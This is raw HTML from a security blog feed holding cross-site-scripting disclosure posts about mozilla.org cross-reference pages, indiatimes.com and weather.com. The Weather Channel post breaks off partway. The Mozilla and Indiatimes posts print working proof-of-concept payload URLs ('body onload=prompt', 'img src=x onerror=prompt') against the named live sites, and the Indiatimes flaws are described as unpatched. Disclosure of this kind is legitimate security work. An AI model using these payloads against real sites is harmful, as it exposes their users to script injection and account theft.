<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/" href="http://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/" target="_blank">http://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/</a><body onload=prompt("tetraph")></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/" href="http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/" target="_blank">http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/</a><body onload=prompt("tetraph")></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /></span><br />
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Video:</b></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://www.youtube.com/watch?v=onA5BgC3zIY"><span style="color: black;">https://www.youtube.com/watch?v=onA5BgC3zIY</span></a></span></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><br /></span><br />
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>(2) Vulnerability Analysis:</b></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">Take the following link as an example,</span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">http://lxr.mozilla.org/mozilla-central/source/chrome/<attacktest></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">In the page reflected, it contains the following codes.</span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="/mozilla-central/source/chrome/%253Cattacktest%253E"></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><attacktest></attacktest></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"></a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">If insert "<body onload=prompt("justqdjing")>" into the URL, the code can be executed.</span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /></span><br />
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">The vulnerability can be attacked without user login. Tests were performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b>(3) Vulnerability Disclosure:</b></span></span><br />
<div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">The vulnerability have been reported to bugzilla.mozilla.org. Mozilla are dealing with this issue.</span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br class="Apple-interchange-newline" />Discovered and Reported by:</span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;">Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/558912321821499392">@justqdjing</a>)</span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/wangjing/" target="_blank">http://www.tetraph.com/<wbr></wbr>wangjing/</a></span></span></div>
</div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><br /><br /></span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span><span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><b>More Details:</b></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://lists.openwall.net/full-disclosure/2014/10/20/8" data-mce-style="color: #000000;" href="http://lists.openwall.net/full-disclosure/2014/10/20/8" style="color: black;">http://lists.openwall.net/full-disclosure/2014/10/20/8</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=141378783804463&w=2" data-mce-style="color: #000000;" href="http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=141378783804463&w=2" style="color: black;">http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://seclists.org/fulldisclosure/2014/Oct/92" data-mce-style="color: #000000;" href="http://seclists.org/fulldisclosure/2014/Oct/92" style="color: black;">http://seclists.org/fulldisclosure/2014/Oct/92</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" data-mce-style="color: #000000;" href="http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" style="color: black;" target="_blank">http://www.tetraph.com/blog/xss-vulnerability/mozilla-xss</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://whitehatview.tumblr.com/post/101466861221/mozilla-mozilla-org-two-sub-domains-cross" data-mce-style="color: #000000;" href="http://whitehatview.tumblr.com/post/101466861221/mozilla-mozilla-org-two-sub-domains-cross" style="color: black;">http://whitehatview.tumblr.com/post/101466861221/mozilla-mozilla</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://tetraph.blog.163.com/blog/static/2346030512014101115642885/" data-mce-style="color: #000000;" href="http://tetraph.blog.163.com/blog/static/2346030512014101115642885/" style="color: black;">http://tetraph.blog.163.com/blog/static/2346030512014101115642885/</a></span><span data-mce-style="color: #000000;"><br /></span><span data-mce-style="color: #000000;"><a data-mce-href="http://computerobsess.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html" data-mce-style="color: #000000;" href="http://computerobsess.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html" style="color: black;">http://computerobsess.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="https://tetraph.wordpress.com/2014/11/26/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains-2/" data-mce-style="color: #000000;" href="https://tetraph.wordpress.com/2014/11/26/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains-2/" style="color: black;">https://tetraph.wordpress.com/2014/11/26/mozilla-two-sub-domains-xss</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://tetraph.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html" data-mce-style="color: #000000;" href="http://tetraph.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html" style="color: black;">http://tetraph.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://itsecurity.lofter.com/post/1cfbf9e7_54fc68f" data-mce-style="color: #000000;" href="http://itsecurity.lofter.com/post/1cfbf9e7_54fc68f" style="color: black;">http://itsecurity.lofter.com/post/1cfbf9e7_54fc68f</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://whitehatview.tumblr.com/post/103540568486/two-of-mozillas-cross-reference-sub-domains" data-mce-style="color: #000000;" href="http://whitehatview.tumblr.com/post/103540568486/two-of-mozillas-cross-reference-sub-domains" style="color: black;">http://whitehatview.tumblr.com/post/103540568486/two-of-mozillas-cross</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://diebiyi.com/articles/security/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" data-mce-style="color: #000000;" href="http://diebiyi.com/articles/security/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" style="color: black;">http://diebiyi.com/articles/security/xss-vulnerability/mozilla-xss</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a data-mce-href="http://www.inzeed.com/kaleidoscope/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" data-mce-style="color: #000000;" href="http://www.inzeed.com/kaleidoscope/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" style="color: black;">http://www.inzeed.com/kaleidoscope/xss-vulnerability/mozilla-xss</a></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="https://mathfas.wordpress.com/2014/11/01/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" data-mce-style="color: #000000;" href="https://mathfas.wordpress.com/2014/11/01/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" style="color: black;">https://mathfas.wordpress.com/2014/11/01/mozilla-xss</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" data-mce-style="color: #000000;" href="http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" style="color: black;">http://www.tetraph.com/blog/xss-vulnerability/mozilla-xss</a></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1121" data-mce-style="color: #000000;" href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1121" style="color: black;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1121</a></span></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-11913241975927063322015-06-20T02:13:00.000-07:002015-06-20T02:13:25.357-07:00All Links in Two Topics of Indiatimes (indiatimes.com) Are Vulnerable to XSS (Cross Site Scripting) Attacks <span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b style="background-color: white;"><br /></b><b style="background-color: white;">All Links in </b><b style="background-color: white;">Two Topics of Indiatimes (indiatimes.com) Are Vulnerable to XSS (Cross Site Scripting) Attacks </b></span></span><br />
<div class="clearfix entry-content">
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b><br /></b><b>(1) Domain Description:</b></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;">http://www.indiatimes.com</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">"The Times of India (TOI) is an Indian English-language daily newspaper. It is the third-largest newspaper in India by circulation and largest selling English-language daily in the world according to Audit Bureau of Circulations (India). According to the Indian Readership Survey (IRS) 2012, the Times of India is the most widely read English newspaper in India with a readership of 7.643 million. This ranks the Times of India as the top English daily in India by readership. </span><span style="font-size: small;">It is owned and published by Bennett, Coleman & Co. Ltd. which is owned by the Sahu Jain family. In the Brand Trust Report 2012, Times of India was ranked 88th among India's most trusted brands and subsequently, according to the Brand Trust Report 2013, Times of India was ranked 100th among India's most trusted brands. In 2014 however, Times of India was ranked 174th among India's most trusted brands according to the Brand Trust Report 2014, a study conducted by Trust Research Advisory." (</span><span style="font-size: small;"><a href="http://en.wikipedia.org/" target="_blank">en.Wikipedia.org</a>)</span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>(2) Vulnerability description:</b></span></span></div>
<span style="font-family: Arial,Helvetica,sans-serif;">The web application indiatimes.com online website has a security problem. Hacker can exploit it by XSS bugs.</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b><br /></b></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;">The code flaw occurs at Indiatimes's URL links. Indiatimes only filter part of the filenames in its website. All URLs under Indiatimes's "photogallery" and "top-llists" topics are affected. </span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;">Indiatimes uses part of the links under "photogallery" and "top-llists" topics to construct its website content without any checking of those links at all. This mistake is very popular in nowaday websites. Developer is not security expert.</span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;">The vulnerability can be attacked without user login. Tests were performed on Mozilla Firefox (26.0) in Ubuntu (12.04) and Microsoft IE (9.0.15) in Windows 7.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://3.bp.blogspot.com/-F2GWTyNqTvY/VHaWmOWmMBI/AAAAAAAAAY0/6EOPcfV8rlc/s1600/indiatimes_xss1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="http://3.bp.blogspot.com/-F2GWTyNqTvY/VHaWmOWmMBI/AAAAAAAAAY0/6EOPcfV8rlc/s1600/indiatimes_xss1.png" width="400" /></a></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://2.bp.blogspot.com/-xkjjU09Xh_s/VHaWnHpijjI/AAAAAAAAAY4/kDSmVSnMkxM/s1600/indiatimes_xss_2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="http://2.bp.blogspot.com/-xkjjU09Xh_s/VHaWnHpijjI/AAAAAAAAAY4/kDSmVSnMkxM/s1600/indiatimes_xss_2.png" width="400" /></a></span></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Codes:</b></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.indiatimes.com/photogallery/" target="_blank">http://www.indiatimes.com/<wbr></wbr>photogallery/</a>">homeqingdao<img src=x onerror=prompt('justqdjing')></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.indiatimes.com/top-lists/" target="_blank">http://www.indiatimes.com/top-<wbr></wbr>lists/</a>">singaporemanagementuniversity<img src=x onerror=prompt('justqdjing')></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.indiatimes.com/photogallery/lifestyle/" target="_blank">http://www.indiatimes.com/<wbr></wbr>photogallery/lifestyle/</a>">astar<img src=x onerror=prompt('justqdjing')></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.indiatimes.com/top-lists/technology/" target="_blank">http://www.indiatimes.com/top-<wbr></wbr>lists/technology/</a>">nationaluniversityofsingapore<img src=x onerror=prompt('justqdjing')></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Video:</b></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://www.youtube.com/watch?v=EeJWu8_5BKU&feature=youtu.be">https://www.youtube.com/watch?v=EeJWu8_5BKU&feature=youtu.be</a></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Blog Details:</b></span></span></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://securityrelated.blogspot.sg/2014/11/two-topics-of-indiatimes-indiatimescom.html">http://securityrelated.blogspot.com/2014/11/two-topics-of-indiatimes-indiatimescom.html</a></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><span style="font-size: small;"><b>What is XSS?</b></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">"Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it." (OWASP)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><span style="font-size: small;"><b>(3) Vulnerability Disclosure:</b></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;">The vulnerabilities were reported to Indiatimes in early September, 2014. However they are still unpatched.</span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;">Discovered and Reported by:</span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;">Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/558910457235251201">@justqdjing</a>)</span></div>
<div style="background-color: white;">
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/wangjing/" target="_blank">http://www.tetraph.com/<wbr></wbr>wangjing/</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Related Articles:</b></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://seclists.org/fulldisclosure/2014/Nov/91">http://seclists.org/fulldisclosure/2014/Nov/91</a></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://lists.openwall.net/full-disclosure/2014/11/27/6">http://lists.openwall.net/full-disclosure/2014/11/27/6</a></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1256">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1256</a></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://progressive-comp.com/?l=full-disclosure&m=141705615327961&w=1">https://progressive-comp.com/?l=full-disclosure&m=141705615327961&w=1</a></span></span></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://tetraph.blog.163.com/blog/static/234603051201501352218524/">http://tetraph.blog.163.com/blog/static/234603051201501352218524/</a></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.techworm.net/2014/12/times-india-website-vulnerable-cross-site-scripting-xss-attacks.html">http://www.techworm.net/2014/12/times-india-website-vulnerable-xss</a></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://cxsecurity.com/issue/WLB-2014120004">https://cxsecurity.com/issue/WLB-2014120004</a></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://vulnerabilitypost.wordpress.com/2014/12/04/all-links-in-two-topics-of-indiatimes-indiatimes-com-are-vulnerable-to-xss-cross-site-scripting-attacks/">https://vulnerabilitypost.wordpress.com/2014/12/04/indiatimes-xss</a></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://diebiyi.com/articles/security/all-links-in-two-topics-of-indiatimes-indiatimes-com-are-vulnerable-to-xss-cross-site-scripting-attacks/">http://diebiyi.com/articles/security/all-links-in-two-topics-of-indiatimes</a></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.inzeed.com/kaleidoscope/computer-security/all-links-in-two-topics-of-indiatimes-indiatimes-com-are-vulnerable-to-xss-cross-site-scripting-attacks/">http://www.inzeed.com/kaleidoscope/computer-security/all-links-in-two-topics-of-indiatimes</a></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://itsecurity.lofter.com/post/1cfbf9e7_54fc6c9">http://itsecurity.lofter.com/post/1cfbf9e7_54fc6c9</a></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://computerobsess.blogspot.com/2014/12/all-links-in-two-topics-of-indiatimes.html">http://computerobsess.blogspot.com/2014/12/all-links-in-two-topics-of-indiatimes.html</a></span></span><br />
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://whitehatview.tumblr.com/post/104310651681/times-of-india-website-vulnerable-to-cross-site-scr">http://whitehatview.tumblr.com/post/104310651681/times-of-india-website-vulnerable-to</a></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/blog/computer-security/all-links-in-two-topics-of-indiatimes-indiatimes-com-are-vulnerable-to-xss-cross-site-scripting-attacks/">http://www.tetraph.com/blog/computer-security/all-links-in-two-topics-of-indiatimes</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
</div>
</div>
</div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-1212310537951973442015-06-20T02:11:00.000-07:002015-06-20T02:11:02.342-07:00The Weather Channel at Least 76.3% Links Vulnerable to XSS Attacks<div style="color: #222222; font-family: arial, sans-serif;">
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>The Weather Channel at Least 76.3% Links Vulnerable to XSS Attacks</b></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Domain Description:</b></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">http://www.weather.com/</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">"The
Weather Channel is an American basic cable and satellite television
channel which broadcasts weather forecasts and weather-related news and
analyses, along with documentaries and entertainment programming related
to weather. Launched on May 2, 1982, the channel broadcasts weather
forecasts and weather-related news and analysis, along with
documentaries and entertainment programming related to weather."</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br />"As
of February 2015, The Weather Channel was received by approximately
97.3 million American households that subscribe to a pay television
service (83.6% of U.S. households with at least one television set),
which gave it the highest national distribution of any U.S. cable
channel. However, it was subsequently dropped by Verizon FiOS (losing
its approximately 5.5 millions subscribers), giving the title of most
distributed network to HLN. Actual viewership of the channel averaged
210,000 during 2013 and has been declining for several years. Content
from The Weather Channel is available for purchase from the NBCUniversal
Archives." (Wikipedia)</span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Vulnerability description:</b></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><b><br /></b><b><br /></b>The Weather Channel has a cyber security problem. Hacker can exploit it by XSS bugs.</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b><br /></b></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">Almost
all links under the domain weather.com are vulnerable to XSS attacks.
Attackers just need to add script at the end of The Weather Channel's
URLs. Then the scripts will be executed.</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">10
thousands of Links were tested based a self-written tool. During the
tests, 76.3% of links belong to weather.com were vulnerable to XSS
attacks.</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">The
reason of this vulnerability is that Weather Channel uses URLs to
construct its HTML tags without filtering malicious script codes. </span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #222222; font-family: arial, sans-serif; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
